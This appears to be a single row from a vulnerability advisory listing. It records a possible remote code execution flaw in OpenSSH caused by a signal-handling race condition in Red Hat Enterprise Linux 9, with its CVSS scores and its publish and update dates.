Vulnerability ID CVSS Base Score Description Vendor Product Publish Date Last Update Date
circl-sa-2024-0001 CVSS-v3.1: 8.1 CVSS-v4.0: 10 Openssh: possible remote code execution due to a race condition in signal handling Red Hat
Red Hat
Red Hat Enterprise Linux 9
Red Hat Enterprise Linux 9
2024-07-01T12:37:00.000Z 2024-07-03T16:42:00.000Z